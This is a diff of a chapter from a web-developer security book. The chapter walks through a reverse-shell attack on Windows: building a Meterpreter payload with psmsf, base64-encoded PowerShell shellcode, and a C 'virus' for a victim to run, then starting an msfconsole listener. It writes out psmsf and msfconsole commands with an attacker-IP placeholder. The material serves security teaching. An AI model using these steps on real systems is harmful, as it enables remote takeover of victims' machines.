binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter7.md

-You can find the video of how it is played out at []().

 I> ## Synopsis
 I>
-I> We will be using a reverse shell
-I> Virus
-I> Payload
+I> In this play, we will use `psmsf` to create a Metasploit resource file to get msfconsole on our attacking machine listening for a reverse tcp shell from our target. `psmsf` will also leverage `msfvenom` to create native windows shellcode from c. `psmsf` inserts this shellcode into a PowerShell script then base64 encodes it, and adds it to a text file prefixed with a PowerShell command to run the base64 encoded PowerShell script.
 I>
+I> We then upload / host the payload generated by `psmsf`.
+I>
+I> We then create a small c file (that we call the virus) that downloads and executes the PowerShell paylaod we have hosted.
+The c file needs to be compiled on the target platform, and given to our victim to run.
-I> Listener is listening
+I>
-I> Payload copied to hosting directory and web server started I> Create and compile virus.
+I> Our target runs the virus.
-I> Target: Run virus
+I> The virus downloads and executes the payload.
-I> Attacker collects reverse shell
+I> The payload runs the base64 encoded script inside it, which spawns a thread and runs immediately from the calling instance of PowerShell which executes a section of memory that we over-write with the shellcode.
+This runs the reverse shell that the attacking machine is listening for.

+Meterpreter is an excellent platform for attacking with.
+It provides us with many useful tools which make tasks like privilege escalation, establishing persistence, lateral movement, pivoting, and others, much easier.

+The other payloads available via `psmsf` are:

+* `windows/shell/reverse_tcp`
+* `windows/meterpreter/reverse_http`

+You can find the video of how this attack is played out at []().

-If you do not already have psmsf on your attack machine, go ahead and clone it as discussed in the Tooling Setup chapter of Fascicle 0.
+If you do not already have `psmsf` on your attack machine, go ahead and clone it as discussed in the Tooling Setup chapter of Fascicle 0.

 {icon=bomb}
 G> ## The Play
 G>
-G> Go ahead and run it, you will be provided with the details you need to take the next steps.
+G> Go ahead and run `psmsf`, you will be provided with the details you need to take the next steps.
 G>
 G> Next we run:
-G> `/opt/psmsf$ python psmsf --attacktype ps --payload windows/meterpreter/reverse_tcp --lhost <listener-attack-ip> --lport 4444'
+G> `/opt/psmsf$ python psmsf --attacktype ps --payload windows/meterpreter/reverse_tcp --lhost <listener-attack-ip> --lport 4444`
 G>
-G> If you do not specify an output directory for the attack files that psmsf creates, it will create the `powershell_attack` directory in your current directory, then generate the PowerShell attack files for us within it.
+G> If you do not specify an output directory for the attack files that `psmsf` creates, it will create the `powershell_attack` directory in your current directory, then generate the PowerShell attack files for you within it.
 The PowerShell attack files are:
-G> 1. `powershell_msf.rc` (the resource file we can feed to `msfconsole`) G> 2. `powershell_hacking.bat` (the PowerShell shellcode payload) G>
+G>  1. `powershell_msf.rc` (the resource file we can feed to `msfconsole`) G>  2. `powershell_hacking.bat` (the PowerShell base64 encoded payload with embedded shellcode) G>
 G> Start your listener using the `powershell_msf.rc` resource rile:
-G> `msfconsole -r powershell_msf.rc'
+G> `msfconsole -r powershell_msf.rc`
 G> or just load the same parameters from the resource file once you have msfconsole running, and follow with:
 G> `exploit -j`:
 G>